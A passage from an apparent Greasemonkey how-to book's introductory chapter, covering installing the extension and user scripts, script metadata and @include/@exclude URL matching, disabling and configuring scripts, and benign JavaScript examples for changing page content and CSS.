Greasemonkey Hacks/Getting Started
Hacks 1–12: Introduction
The first thing you need to do to get started with Greasemonkey is install it. Open Firefox and go to http://greasemonkey.mozdev.org. Click the Install Greasemonkey link. Firefox will warn you that it prevented this site from installing software, as shown in Figure 1-1.
Click the Edit Options button to bring up the Allowed Sites dialog, as shown in Figure 1-2.
Click the Allow button to add the Greasemonkey site to your list of allowed sites; then click OK to dismiss the dialog. Now, click the Install Greasemonkey link again, and Firefox will pop up the Software Installation dialog, as shown in Figure 1-3.
Click Install Now to begin the installation process. After it downloads, quit Firefox and relaunch it to finish installing Greasemonkey.
Now that that's out of the way, let's get right to it.
Install a User Script
Greasemonkey won't do anything until you start installing user scripts to customize specific web pages.
A Greasemonkey user script is a single file, written in JavaScript, that customizes one or more web pages. So, before Greasemonkey can start working for you, you need to install a user script.
Tip
Many user scripts are available at the Greasemonkey script repository: http://userscripts.org.
This hack shows three ways to install user scripts. The first user script I ever wrote was called Butler. It adds functionality to Google search results.
Installing from the Context Menu
Here's how to install Butler from the context menu:
- Visit the Butler home page (http://diveintomark.org/projects/butler/) to see a brief description of the functionality that Butler offers.
- Right-click (Control-click on a Mac) the link titled "Download version…" (at the time of this writing, Version 0.3 is the latest release).
- From the context menu, select Install User Script….
- A dialog titled Install User Script will pop up, displaying the name of the script you are about to install (Butler, in this case), a brief description of what the script does, and a list of included and excluded pages. All of this information is taken from the script itself [Hack #2].
- Click OK to install the user script.
If all went well, Greasemonkey will display the following alert: "Success! Refresh page to see changes."
Now, search for something in Google. In the search results page, there is a line at the top of the results that says "Try your search on: Yahoo, Ask Jeeves, AlltheWeb…" as shown in Figure 1-4. There is also a banner along the top that says "Enhanced by Butler." All of these options were added by the Butler user script.
Installing from the Tools Menu
My Butler user script has a home page, but not all scripts do. Sometimes the author posts only the script itself. You can still install such scripts, even if there are no links to right-click.
Visit http://diveintomark.org/projects/butler/butler.user.js. You will see the Butler source code displayed in your browser. From the Tools menu, select Install User Script…. Greasemonkey will pop up the Install User Script dialog, and the rest of the installation is the same as described in the previous section.
Editing Greasemonkey's Configuration Files
Like most Firefox browser extensions, Greasemonkey stores its configuration files in your Firefox profile directory. You can install a user script manually by placing it in the right directory and editing the Greasemonkey configuration file with a text editor.
First you'll need to find your Firefox profile directory, which is harder than it sounds. The following list, from Nigel McFarlane's excellent Firefox Hacks (O'Reilly), shows where to find this directory on your particular system:
- Single-user Windows 95/98/ME: C:\Windows\Application Data\Mozilla\Firefox
- Multiuser Windows 95/98/ME: C:\Windows\Profiles\%USERNAME%\Application Data\Mozilla\Firefox
- Windows NT 4.x: C:\Winnt\Profiles\%USERNAME%\Application Data\Mozilla\Firefox
- Windows 2000 and XP: C:\Documents and Settings\%USERNAME%\Application Data\Mozilla\Firefox
- Unix and Linux: ~/.mozilla/firefox
- Mac OS X: ~/Library/Application Support/Firefox
Within your Firefox directory is your Profiles directory, and within that is a randomly named directory (for security reasons). Within that is a series of subdirectories: extensions/{e4a8a97b-f2ed-450b-b12d-ee082ba24781}/chrome/greasemonkey/content/scripts/. This final scripts directory contains all your installed user scripts, as well as a configuration file named config.xml. Here's a sample config.xml file:
<UserScriptConfig>
  <Script filename="bloglinesautoloader.user.js" name="Bloglines Autoloader" namespace="http://diveintomark.org/projects/greasemonkey/" description="Auto-display all new items in Bloglines (the equivalent of clicking the root level of your subscriptions)" enabled="true">
    <Include>http://bloglines.com/myblogs*</Include>
    <Include>http://www.bloglines.com/myblogs*</Include>
  </Script>
  <Script filename="googlesearchkeys.user.js" name="Google Searchkeys" namespace="http://www.imperialviolet.org" description="Adds one-press access keys to Google search results" enabled="true">
    <Include>http://www.google.*/search*</Include>
  </Script>
  <Script filename="mailtocomposeingmail.user.js" name="Mailto Compose In GMail" namespace="http://blog.monstuff.com/archives/000238.html" description="Rewrites &quot;mailto:&quot; links to GMail compose links" enabled="true">
    <Include>*</Include>
    <Exclude>http://gmail.google.com</Exclude>
  </Script>
</UserScriptConfig>
To install a new script, simply copy it to this scripts directory and add a <Script> entry like the other ones in config.xml. The <Script> element has five attributes: filename, name, namespace, description, and enabled. Within the <Script> element you can have multiple <Include> and <Exclude> elements, as defined in "Provide a Default Configuration" [Hack #2].
For example, to manually install the Butler user script, copy the butler.user.js file into your scripts directory, and then add this XML snippet to config.xml, just before </UserScriptConfig>:
<Script filename="butler.user.js" name="Butler" namespace="http://diveintomark.org/projects/butler/" description="Link to competitors in Google search results" enabled="true">
  <Include>http://*.google.*/*</Include>
</Script>
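If you add entries by hand often, the XML can be generated instead of typed. The following is only a sketch: escapeXml and buildScriptEntry are hypothetical helper names, not part of Greasemonkey, and the layout simply mirrors the sample config.xml shown earlier. The escaping step matters because a quotation mark inside a description would otherwise end the attribute early.

```javascript
// Hypothetical helper: escape characters that are unsafe inside XML text or attributes.
function escapeXml(text) {
    return String(text)
        .replace(/&/g, '&amp;')
        .replace(/</g, '&lt;')
        .replace(/>/g, '&gt;')
        .replace(/"/g, '&quot;');
}

// Hypothetical helper: build one <Script> entry for config.xml from plain data.
function buildScriptEntry(script) {
    var lines = [];
    lines.push('<Script filename="' + escapeXml(script.filename) + '"' +
        ' name="' + escapeXml(script.name) + '"' +
        ' namespace="' + escapeXml(script.namespace) + '"' +
        ' description="' + escapeXml(script.description) + '"' +
        ' enabled="' + (script.enabled ? 'true' : 'false') + '">');
    (script.includes || []).forEach(function (url) {
        lines.push('  <Include>' + escapeXml(url) + '</Include>');
    });
    (script.excludes || []).forEach(function (url) {
        lines.push('  <Exclude>' + escapeXml(url) + '</Exclude>');
    });
    lines.push('</Script>');
    return lines.join('\n');
}

// Rebuild the "Mailto Compose In GMail" entry from the sample config.xml.
var mailtoEntry = buildScriptEntry({
    filename: 'mailtocomposeingmail.user.js',
    name: 'Mailto Compose In GMail',
    namespace: 'http://blog.monstuff.com/archives/000238.html',
    description: 'Rewrites "mailto:" links to GMail compose links',
    enabled: true,
    includes: ['*'],
    excludes: ['http://gmail.google.com']
});
```

Paste the resulting string just before </UserScriptConfig>, exactly as you would a hand-written entry.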
Tip
A user script's filename must end in .user.js. If you've gotten the file extension wrong, you won't be able to right-click the script's link and select Install User Script… from the context menu. You won't even be able to visit the script itself and select Install User Script… from the Tools menu.
Provide a Default Configuration
User scripts can be self-describing; they can contain information about what they do and where they should run by default.
Every user script has a section of metadata, which tells Greasemonkey about the script itself, where it came from, and when to run it. You can use this to provide users with information about your script, such as its name and a brief description of what the script does. You can also provide a default configuration for where the script should run: one page, one site, or a selection of multiple sites.
The Code
Save the following user script as helloworld.user.js:
Example: Hello World
// ==UserScript==
// @name          Hello World
// @namespace     http://www.oreilly.com/catalog/greasemonkeyhacks/
// @description   example script to alert "Hello world!" on every page
// @include       *
// @exclude       http://oreilly.com/*
// @exclude       http://www.oreilly.com/*
// ==/UserScript==

alert('Hello world!');
There are five separate pieces of metadata here, wrapped in a set of Greasemonkey-specific comments.
Wrapper
Let's take them in order, starting with the wrapper:
// ==UserScript==
//
// ==/UserScript==
These comments are significant and must match this pattern exactly. Greasemonkey uses them to signal the start and end of a user script's metadata section. This section can be defined anywhere in your script, but it's usually near the top.
Name
Within the metadata section, the first item is the name:
// @name Hello World
This is the name of your user script. It is displayed in the install dialog when you first install the script and later in the Manage User Scripts dialog. It should be short and to the point.
@name is optional. If present, it can appear only once. If not present, it defaults to the filename of the user script, minus the .user.js extension.
Namespace
Next comes the namespace:
// @namespace http://www.oreilly.com/catalog/greasemonkeyhacks/
This is a URL, which Greasemonkey uses to distinguish user scripts that have the same name but are written by different authors. If you have a domain name, you can use it (or a subdirectory) as your namespace. Otherwise, you can use a tag: URI.
Tip
Learn more about tag: URIs at http://www.taguri.org.
@namespace is optional. If present, it can appear only once. If not present, it defaults to the domain from which the user downloaded the user script.
Tip
You can specify the items of your user script metadata in any order. I like @name, @namespace, @description, @include, and finally @exclude, but there is nothing special about this order.
Description
Next comes the description:
// @description example script to alert "Hello world!" on every page
This is a human-readable description of what the user script does. It is displayed in the install dialog when you first install the script and later in the Manage User Scripts dialog. It should be no longer than two sentences.
@description is optional. If present, it can appear only once. If not present, it defaults to an empty string.
Tip
Though @description is not mandatory, don't forget to include it. Even if you are writing user scripts only for yourself, you will eventually end up with dozens of them, and administering them all in the Manage User Scripts dialog will be much more difficult if you don't include a description.
URL Directives
The next three lines are the most important items (from Greasemonkey's perspective). The @include and @exclude directives give a series of URLs and wildcards that tell Greasemonkey where to run this user script:
// @include       *
// @exclude       http://oreilly.com/*
// @exclude       http://www.oreilly.com/*
The @include and @exclude directives share the same syntax. They can be a URL, a URL with the * character as a simple wildcard for part of the domain name or path, or simply the * wildcard character by itself. In this case, we are telling Greasemonkey to execute the Hello World script on all sites except http://oreilly.com and http://www.oreilly.com. Excludes take precedence over includes, so if you went to http://www.oreilly.com/catalog/, the user script would not run. That URL matches @include * (all sites), but it is excluded because it also matches @exclude http://www.oreilly.com/*.
@include and @exclude are optional. You can specify as many included and excluded URLs as you like, but you must specify each on its own line. If neither is specified, Greasemonkey will execute your user script on all sites (as if you had specified @include *).
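To make the defaults concrete, here is a rough sketch of how a metadata section could be read from a script's source. It is not Greasemonkey's own parser: parseMetadata is a hypothetical name, the function trims whitespace more leniently than Greasemonkey may, and it leaves the namespace as null because the download domain is not known to it.

```javascript
// Hypothetical sketch: read the metadata section of a user script.
// Mirrors the defaults described in this hack; not Greasemonkey's real code.
function parseMetadata(source, filename) {
    var meta = {
        name: filename.replace(/\.user\.js$/, ''), // default: filename minus .user.js
        namespace: null,  // real default is the download domain, unknown here
        description: '',  // default: empty string
        includes: [],
        excludes: []
    };
    var lines = source.split(/\r?\n/);
    var inBlock = false;
    for (var i = 0; i < lines.length; i++) {
        var line = lines[i].replace(/^\s+|\s+$/g, '');
        if (line === '// ==UserScript==') { inBlock = true; continue; }
        if (line === '// ==/UserScript==') { break; }
        if (!inBlock) { continue; }
        var match = /^\/\/\s*@(\w+)\s+(.*)$/.exec(line);
        if (!match) { continue; }
        var key = match[1], value = match[2];
        if (key === 'include') {
            meta.includes.push(value);
        } else if (key === 'exclude') {
            meta.excludes.push(value);
        } else if (key === 'name' || key === 'namespace' || key === 'description') {
            meta[key] = value;
        }
    }
    // With no @include and no @exclude, behave as if "@include *" were given.
    if (meta.includes.length === 0 && meta.excludes.length === 0) {
        meta.includes.push('*');
    }
    return meta;
}

var helloSource = [
    '// ==UserScript==',
    '// @name Hello World',
    '// @namespace http://www.oreilly.com/catalog/greasemonkeyhacks/',
    '// @description example script to alert "Hello world!" on every page',
    '// @include *',
    '// @exclude http://oreilly.com/*',
    '// @exclude http://www.oreilly.com/*',
    '// ==/UserScript==',
    "alert('Hello world!');"
].join('\n');

var helloMeta = parseMetadata(helloSource, 'helloworld.user.js');
// helloMeta.name is 'Hello World'; helloMeta.excludes holds two patterns
```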
Master the @include and @exclude Directives
Describing exactly where you want your user script to execute can be tricky.
As described in "Provide a Default Configuration" [Hack #2], Greasemonkey executes a user script based on @include and @exclude parameters: URLs with * wildcards that match any number of characters. This might seem like a simple syntax, but combining wildcards to match exactly the set of pages you want is trickier than you think.
Matching with or Without the www. Prefix
Here's a common scenario: a site is available at http://example.com and http://www.example.com. The site is the same in both cases, but neither URL redirects to the other. If you type example.com in the location bar, you get the site at http://example.com. If you visit www.example.com, you get exactly the same site, but the location bar reads http://www.example.com.
Let's say you want to write a user script that runs in both cases. Greasemonkey makes no assumptions about URLs that an end user might consider equivalent. If a site responds on both http://example.com and http://www.example.com, you need to declare both variations, as shown in this example:
@include http://example.com/*
@include http://www.example.com/*
Matching All Subdomains of a Site
Here's a slightly more complicated scenario. Slashdot is a popular technical news and discussion site. It has a home page, which is available at both http://slashdot.org and http://www.slashdot.org. But it also has specialized subdomains, such as http://apache.slashdot.org/, http://apple.slashdot.org/, and so forth.
Say you want to write a user script that runs on all these sites. You can use a wildcard within the URL itself to match all the subdomains, like this:
@include http://slashdot.org/*
@include http://*.slashdot.org/*
The first line matches when you visit http://slashdot.org. The second line matches when you visit http://www.slashdot.org (the * wildcard matches www). The second line also matches when you visit http://apache.slashdot.org/ or http://apple.slashdot.org/; the * wildcard matches apache and apple, respectively.
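If you want to check a set of patterns before relying on them, the matching rules can be approximated in a few lines. This is a sketch under the assumption that * simply matches any run of characters, as described above; wildcardToRegExp and shouldRun are hypothetical names, not Greasemonkey functions. It also applies the rule from [Hack #2] that excludes take precedence over includes.

```javascript
// Hypothetical helper: turn a pattern with * wildcards into a regular expression.
function wildcardToRegExp(pattern) {
    // Escape every regex metacharacter except *, then let * match anything.
    var escaped = pattern.replace(/[.+?^${}()|[\]\\]/g, '\\$&');
    return new RegExp('^' + escaped.replace(/\*/g, '.*') + '$');
}

// Hypothetical helper: decide whether a script would run on a given URL.
function shouldRun(url, includes, excludes) {
    function matchesAny(patterns) {
        for (var i = 0; i < patterns.length; i++) {
            if (wildcardToRegExp(patterns[i]).test(url)) { return true; }
        }
        return false;
    }
    // Excludes win over includes.
    return matchesAny(includes) && !matchesAny(excludes);
}

var slashdotIncludes = ['http://slashdot.org/*', 'http://*.slashdot.org/*'];

shouldRun('http://slashdot.org/', slashdotIncludes, []);             // true
shouldRun('http://apple.slashdot.org/', slashdotIncludes, []);       // true
shouldRun('http://slashdot.org/', ['http://*.slashdot.org/*'], []);  // false
```

The last call shows why both lines are needed: the subdomain pattern requires a dot before slashdot.org, so it never matches the bare domain.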
Matching Different Top-Level Domains of a Site
Now things get really tricky. Amazon is available in the United States at http://www.amazon.com. (Because http://amazon.com visibly redirects you to http://www.amazon.com, we won't need to worry about matching both.) But Amazon also has country-specific sites, such as http://www.amazon.co.uk/ in the United Kingdom, http://www.amazon.co.jp/ in Japan, and so forth.
If you want to write a user script that runs on all of Amazon's country-specific sites, there is a special type of wildcard, .tld, that matches all the top-level domains, as shown in the following example:
@include http://www.amazon.tld/*
This special syntax matches any top-level domain: .com, .org, .net, or a country-specific domain, such as .co.uk or .co.jp. Greasemonkey keeps a list of all the registered top-level domains in the world and expands the .tld wildcard to include each of them.
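Conceptually, the expansion might look like the following sketch. The list of domains here is a tiny illustrative sample, and expandTld is a hypothetical function; Greasemonkey's actual list and implementation are not shown in this hack.

```javascript
// Illustrative sample only; the real list of top-level domains is far longer.
var SAMPLE_TLDS = ['com', 'org', 'net', 'co.uk', 'co.jp', 'de'];

// Hypothetical helper: expand a ".tld" host suffix into one pattern per domain.
function expandTld(pattern, tlds) {
    // Only expand ".tld" when it ends the host name, just before the path.
    var match = /^([a-z]+:\/\/[^\/]*)\.tld(\/.*)?$/.exec(pattern);
    if (!match) { return [pattern]; }
    var result = [];
    for (var i = 0; i < tlds.length; i++) {
        result.push(match[1] + '.' + tlds[i] + (match[2] || ''));
    }
    return result;
}

var amazonPatterns = expandTld('http://www.amazon.tld/*', SAMPLE_TLDS);
// amazonPatterns[0] is 'http://www.amazon.com/*'
// amazonPatterns[3] is 'http://www.amazon.co.uk/*'
```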
Tip
You can find out more about the available top-level domains at http://www.icann.org/tlds/.
Deciding Between * and http://*
One final note, before we put the @include and @exclude issue to bed. If you're writing a user script that applies to all pages, there are two subtly different ways to do that. Here's the first way:
@include *
This means that the user script should execute absolutely everywhere. If you visit a web site, the script will execute. If you visit a secure site (one with an https:// address), the script will execute. If you open an HTML file from your local hard drive, the script will execute. If you open a blank new window, the script will execute (since technically the "location" of a blank window is about:blank).
This might not be what you want. If you want the script to execute only on actual remote web pages "out there" on the Internet, you should specify the @include line differently, like this:
@include http://*
This means that the user script will execute only on remote web sites, whose address starts with http://. This will not include secure web sites, such as your bank's online bill payment site, because that address starts with https://. If you want the script to run on both secure and standard web sites, you'll need to explicitly specify both, like so:
@include http://*
@include https://*
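The difference between these choices is easy to see with a handful of sample locations. The sketch below assumes, as before, that * matches any run of characters; matchesPattern and covered are hypothetical helpers, and the sample addresses are made up for illustration.

```javascript
// Hypothetical helper (not Greasemonkey's code): test a location against a * pattern.
function matchesPattern(url, pattern) {
    var escaped = pattern.replace(/[.+?^${}()|[\]\\]/g, '\\$&');
    return new RegExp('^' + escaped.replace(/\*/g, '.*') + '$').test(url);
}

// Made-up sample locations: a web site, a secure site, a local file, a blank window.
var sampleLocations = [
    'http://www.example.com/',
    'https://bank.example.com/pay',
    'file:///home/user/test.html',
    'about:blank'
];

// Return the sample locations matched by at least one of the given patterns.
function covered(patterns) {
    return sampleLocations.filter(function (url) {
        return patterns.some(function (pattern) {
            return matchesPattern(url, pattern);
        });
    });
}

var everywhere = covered(['*']);                      // all four locations
var plainHttp = covered(['http://*']);                // only the http:// address
var remoteOnly = covered(['http://*', 'https://*']);  // the http:// and https:// addresses
```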
Prevent a User Script from Executing
You can disable a user script temporarily, disable all user scripts, or uninstall a user script permanently.
Once you have a few user scripts running, you might want to temporarily disable some or all of them. There are several different ways to prevent a user script from running.
Disabling a User Script Without Uninstalling It
The easiest way to disable a user script is in the Manage User Scripts dialog. Assuming you installed the Butler user script [Hack #1], you can disable it with just a few clicks:
- From the menu bar, select Tools → Manage User Scripts…. Greasemonkey will pop up the Manage User Scripts dialog.
- In the left pane of the dialog is a list of all the user scripts you have installed. (If you've been following along from the beginning of the book, this will include just one script: Butler.)
- Select Butler in the list if it is not already selected, and deselect the Enabled checkbox. The color of Butler in the left pane should change subtly from black to gray. (This is difficult to see while it is still selected, but it's more useful once you have dozens of scripts installed.)
- Click OK to exit the Manage User Scripts dialog.
Now, Butler is installed, but inactive. You can verify this by searching for something on Google. It should no longer say "Enhanced by Butler" along the top. You can reenable the Butler user script by repeating the procedure and reselecting the Enabled checkbox in the Manage User Scripts dialog.
Tip
Once disabled, a user script will remain disabled until you manually reenable it, even if you quit and relaunch Firefox.
Disabling All User Scripts
While Greasemonkey is installed, it displays a little smiling monkey icon in the status bar, as shown in Figure 1-5.
Clicking the Greasemonkey icon in the status bar disables Greasemonkey entirely; any user scripts you have installed will no longer execute. The Greasemonkey icon will frown and turn gray to indicate that Greasemonkey is currently disabled, as shown in Figure 1-6.
Clicking the icon again reenables Greasemonkey and any enabled user scripts.
Disabling a User Script by Removing All Included Pages
As shown in "Master the @include and @exclude Directives" [Hack #3], each user script has two lists: the pages on which the script runs and the pages on which it does not. Another way to prevent a user script from executing is to remove all the pages on which it runs:
- From the menu bar, select Tools → Manage User Scripts…. Greasemonkey will pop up the Manage User Scripts dialog.
- In the left pane of the dialog is a list of all the user scripts you have installed.
- Select Butler in the list if it is not already selected, and then select http://*.google.com/* in the list of Included Pages. Click the Remove button to remove this URL from the list.
- Click OK to exit the Manage User Scripts dialog.
Disabling a User Script by Excluding All Pages
Yet another way to disable a user script is to add a wildcard to exclude it from all pages:
- From the menu, select Tools → Manage User Scripts…. Greasemonkey will pop up the Manage User Scripts dialog.
- In the left pane of the dialog is a list of all the user scripts you have installed.
- Select Butler in the list if it is not already selected.
- Under the Excluded Pages list, click the Add button. Greasemonkey will pop up an Add Page dialog box. Type * and click OK.
- Click OK to exit the Manage User Scripts dialog.
Now, Butler is still installed and technically still active. But because excluded pages take precedence over included pages, Butler will never actually be executed, because you have told Greasemonkey to exclude it from all pages.
Disabling a User Script by Editing config.xml
As shown in "Install a User Script" [Hack #1], Greasemonkey stores the list of installed scripts in a configuration file, config.xml, deep within your Firefox profile directory:
<UserScriptConfig>
  <Script filename="butler.user.js" name="Butler" namespace="http://diveintomark.org/projects/butler/" description="Link to competitors from Google search results" enabled="true">
    <Include>http://*.google.com/*</Include>
  </Script>
</UserScriptConfig>
You can manually edit this file to disable a user script. To disable Butler, find its <Script> element in config.xml, and then set the enabled attribute to false.
Uninstalling a User Script
Finally, you can remove a user script entirely by uninstalling it:
- From the menu bar, select Tools → Manage User Scripts…. Greasemonkey will pop up a Manage User Scripts dialog.
- In the left pane, select Butler.
- Click Uninstall.
- Click OK to exit the Manage User Scripts dialog.
Butler is now uninstalled completely.
Configure a User Script
There's more than one way to configure Greasemonkey user scripts: before, during, and after installation.
One of the most important pieces of information about a user script is where it should run. One page? Every page on one site? Multiple sites? All sites? This hack explains several different ways to configure where a user script executes.
Inline
As described in "Provide a Default Configuration" [Hack #2], user scripts contain a section that describes what the script is and where it should run. Editing the @include and @exclude lines in this section is the first and easiest way to configure a user script, because the configuration travels with the script code. If you copy the file to someone else's computer or publish it online, other people will pick up the default configuration.
During Installation
Another good time to alter a script's metadata is during installation. Remember in "Install a User Script" [Hack #1] when you first installed the Butler user script? Immediately after you select the Install User Script… menu item, Greasemonkey displays a dialog box titled Install User Script, which contains lists of the included and excluded pages, as shown in Figure 1-7.
The two lists are populated with the defaults that are defined in the script's metadata section (specifically, the @include and @exclude lines), but you can change them to anything you like before you install the script. Let's say, for example, that you like Butler, but you have no use for it on Froogle, Google's cleverly named product comparison site. Before you install the script, you can modify the configuration to exclude that site but still let the script work on other Google sites.
To ensure that Butler doesn't alter Froogle, click the Add… button under "Excluded pages" and type the wildcard URL for Froogle, as shown in Figure 1-8.
After Installation
You can also reconfigure a script's included and excluded pages after the script is installed. Assuming you previously excluded Froogle from Butler's configuration (as described in the previous section), let's now change the configuration to include Froogle again:
- From the Firefox menu, select Tools → Manage User Scripts…. Greasemonkey will pop up the Manage User Scripts dialog.
- In the pane on the left, select Butler. In the pane on the right, Greasemonkey should show you two lists: one of included pages (http://*.google.*/*) and one of excluded pages (http://froogle.google.com/*).
- In the "Excluded pages" list, select http://froogle.google.com/* and click the Remove button.
- Click OK to exit the Manage User Scripts dialog.
Now, search for a product on Froogle to verify that Butler is once again being executed.
Editing Configuration Files
The last way to reconfigure a user script is to manually edit the config.xml file, which is located within your Firefox profile directory. (See "Install a User Script" [Hack #1] for the location.) The graphical dialogs Greasemonkey provides are just friendly ways of editing config.xml without knowing it.
Each installed user script is represented by a <Script> element, as shown in the following example:
<Script filename="helloworld.user.js" name="Hello World" namespace="http://www.oreilly.com/catalog/greasemonkeyhacks/" description="example script to alert &quot;Hello world!&quot; on every page" enabled="true">
  <Include>*</Include>
  <Exclude>http://oreilly.com/*</Exclude>
  <Exclude>http://www.oreilly.com/*</Exclude>
</Script>
You can make any changes you like to the config.xml file. You can add, remove, or edit the <Include> and <Exclude> elements to change where the script runs. You can change the enabled attribute to false to disable the script. You can even uninstall the script by deleting the entire <Script> element.
Tip
Starting in Version 0.5, Greasemonkey no longer caches the config.xml file in memory. If you manually change the config.xml file while Firefox is running, you will see the changes immediately when you navigate to a new page or open the Manage User Scripts dialog.
Add or Remove Content on a Page
Use DOM methods to manipulate the content of a web page.
Since most user scripts center around adding or removing content from a web page, let's quickly review the standard DOM methods for manipulating content.
Adding an Element
The following code adds a new element to the end of the page. The element will appear at the bottom of the page, unless you style it with CSS to position it somewhere else [Hack #7]:
var elmNewContent = document.createElement('div');
document.body.appendChild(elmNewContent);
Removing an Element
You can also remove elements from a page. Removed elements disappear from the page (obviously), and any content after them collapses to fill the space the elements occupied. The following code finds the element with id="ads" and removes it:
var elmDeleted = document.getElementById("ads");
elmDeleted.parentNode.removeChild(elmDeleted);
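Keep in mind that getElementById returns null when no element has the requested id, in which case the code above would throw an error. A defensive variant might look like this sketch; removeById is a hypothetical helper name, and the document is passed in as a parameter only so that the function can be tried outside a browser.

```javascript
// Hypothetical helper: remove the element with the given id, if it exists.
// Returns true when an element was removed and false when there was nothing to do.
function removeById(doc, id) {
    var elm = doc.getElementById(id);
    if (!elm || !elm.parentNode) {
        return false; // no such element, or it is not attached to a parent
    }
    elm.parentNode.removeChild(elm);
    return true;
}

// In a user script you would call it like this:
// removeById(document, 'ads');
```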
Tip
If all you want to do is remove ads, it's probably easier to install the AdBlock extension than to write your own user script. You can download AdBlock at http://adblock.mozdev.org.
Inserting an Element
Many user scripts insert content into a page, rather than appending it to the end of the page. The following code creates a link to http://www.example.com and inserts it immediately before the element with id="foo":
var elmNewContent = document.createElement('a');
elmNewContent.href = 'http://www.example.com/';
elmNewContent.appendChild(document.createTextNode('click here'));
var elmFoo = document.getElementById('foo');
elmFoo.parentNode.insertBefore(elmNewContent, elmFoo);
You can also insert content after an existing element, by using the nextSibling property:
elmFoo.parentNode.insertBefore(elmNewContent, elmFoo.nextSibling);
Tip
Inserting new content before elmFoo.nextSibling will work even if elmFoo is the last child of its parent (i.e., it has no next sibling). In this case, elmFoo.nextSibling will return null, and the insertBefore function will simply append the new content after all other siblings. In other words, this example code will always work, even when it seems like it shouldn't.
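Because the DOM has no built-in insertAfter method, it can be convenient to wrap this idiom in a small function. The name insertAfter below is my own choice for this sketch, not a standard DOM method.

```javascript
// Hypothetical convenience wrapper around insertBefore and nextSibling.
function insertAfter(newNode, referenceNode) {
    // When referenceNode is the last child, nextSibling is null and
    // insertBefore appends newNode at the end of the parent.
    return referenceNode.parentNode.insertBefore(newNode, referenceNode.nextSibling);
}

// In a user script, with elmNewContent and elmFoo defined as in the example above:
// insertAfter(elmNewContent, elmFoo);
```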
Replacing an Element
You can replace entire chunks of a page in one shot by using the replaceChild method. The following code replaces the element with id="extra" with content that we create on the fly:
var elmNewContent = document.createElement('p');
elmNewContent.appendChild(document.createTextNode('Replaced!'));
var elmExtra = document.getElementById('extra');
elmExtra.parentNode.replaceChild(elmNewContent, elmExtra);
As you can see from the previous few examples, the process of creating new content can be arduous. Create an element, append some text, set individual attributes…bah. There is an easier way. It's not a W3C-approved DOM property, but all major browsers support the innerHTML property for getting or setting HTML content as a string. The following code accomplishes much the same thing as the previous example, although it replaces the contents of the element with id="extra" rather than the element itself:
var elmExtra = document.getElementById('extra');
elmExtra.innerHTML = '<p>Replaced!</p>';
The HTML you set with the innerHTML property can be as complex as you like. Firefox will parse it and insert it into the DOM tree, just as if you had created each element and inserted it with standard DOM methods.
Modifying an Element's Attributes
Modifying a single attribute is simple. Each element is an object in JavaScript, and each attribute is reflected by a corresponding property. The following code finds the link with id="somelink" and changes its href property to link to a different URL:
var elmLink = document.getElementById('somelink');
elmLink.href = 'http://www.oreilly.com/';
You can accomplish the same thing with the setAttribute method:
elmLink.setAttribute('href', 'http://www.oreilly.com/');
This is occasionally useful, if you are setting an attribute whose name you don't know in advance.
You can also remove an attribute entirely with the removeAttribute method:
elmLink.removeAttribute('href');
Tip
See "Make Pop-up Titles Prettier" [Hack #28] for an example of why this might be useful.
If you remove the href attribute from a link, it will still be an <a> element, but it will cease to be a link. If the link has an id or name attribute, it will still be a page anchor, but you will no longer be able to click it to follow the link.
Tip
http://www.quirksmode.org is a great reference for browser DOM support.
Alter a Page's Style
There are four basic ways to add or modify a page's CSS rules.
In many of the user scripts I've written, I want to make things look a certain way. Either I'm modifying the page's original style in some way, or I'm adding content to the page and I want to make it look different from the rest of the page. There are several ways to accomplish this.
Adding a Global Style
Here is a simple function that I reuse in most cases in which I need to add arbitrary styles to a page. It takes a single parameter, a string containing any number of CSS rules:
function addGlobalStyle(css) {
    try {
        var elmHead, elmStyle;
        elmHead = document.getElementsByTagName('head')[0];
        elmStyle = document.createElement('style');
        elmStyle.type = 'text/css';
        elmHead.appendChild(elmStyle);
        elmStyle.innerHTML = css;
    } catch (e) {
        if (!document.styleSheets.length) {
            document.createStyleSheet();
        }
        document.styleSheets[0].cssText += css;
    }
}
Inserting or Removing a Single Style
As you see in the previous example, Firefox maintains a list of the stylesheets in use on the page, in document.styleSheets (note the capitalization!). Each item in this collection is an object, representing a single stylesheet. Each stylesheet object has a collection of rules, and methods to add new rules or remove existing rules.
The insertRule method takes two parameters. The first is the CSS rule to insert, and the second is the positional index of the rule before which to insert the new rule:
document.styleSheets[0].insertRule('html, body { font-size: large }', 0);
Tip
In CSS, order matters; if there are two rules for the same CSS selector, the later rule takes precedence. The previous line will insert a rule before all other rules, in the page's first stylesheet.
You can also delete individual rules by using the deleteRule method. It takes a single parameter, the positional index of the rule to remove. The following code will remove the first rule, which we just inserted with insertRule:
document.styleSheets[0].deleteRule(0);
Modifying an Element's Style
You can also modify the style of a single element by setting properties on the element's style attribute. The following code finds the element with id="foo" and sets its background color to red:
var elmModify = document.getElementById("foo");
elmModify.style.backgroundColor = 'red';
Tip
The property names of individual styles are not always obvious. Generally they follow a pattern, where the CSS rule margin-top becomes the JavaScript expression someElement.style.marginTop. But there are exceptions. The float property is set with elmModify.style.cssFloat, since float is a reserved word in JavaScript.
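The general naming pattern is mechanical enough to express in code. The following sketch covers only the hyphen-to-camelCase rule and the float exception mentioned above; cssPropertyToJs is a hypothetical helper name, and other exceptions may exist that it does not handle.

```javascript
// Hypothetical helper: convert a CSS property name to its JavaScript style property.
function cssPropertyToJs(cssName) {
    if (cssName === 'float') {
        return 'cssFloat'; // float is a reserved word in JavaScript
    }
    // Drop each hyphen and capitalize the letter that follows it.
    return cssName.replace(/-([a-z])/g, function (match, letter) {
        return letter.toUpperCase();
    });
}

cssPropertyToJs('margin-top');        // 'marginTop'
cssPropertyToJs('background-color');  // 'backgroundColor'
cssPropertyToJs('float');             // 'cssFloat'
```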
There is no easy way to set multiple properties at once. In regular JavaScript, you can set multiple styles by calling the setAttribute method to set the style attribute to a string:
elmModify.setAttribute("style", "background-color: red; color: white; " +
    "font: small serif");
However, as explained in "Avoid Common Pitfalls" [Hack #12], this does not work within Greasemonkey scripts.
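One possible workaround is to set the properties one at a time in a loop. This sketch assumes that assigning individual style properties works in your script, as it does in the single-property example earlier in this hack; setStyles is a hypothetical helper name.

```javascript
// Hypothetical helper: apply several style properties to one element.
// Property names use the JavaScript form (backgroundColor, not background-color).
function setStyles(elm, styles) {
    for (var name in styles) {
        if (Object.prototype.hasOwnProperty.call(styles, name)) {
            elm.style[name] = styles[name];
        }
    }
    return elm;
}

// In a user script:
// setStyles(document.getElementById('foo'), {
//     backgroundColor: 'red',
//     color: 'white',
//     font: 'small serif'
// });
```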
Master XPath Expressions
Tap into a powerful new way to find exactly what you're looking for on a page.
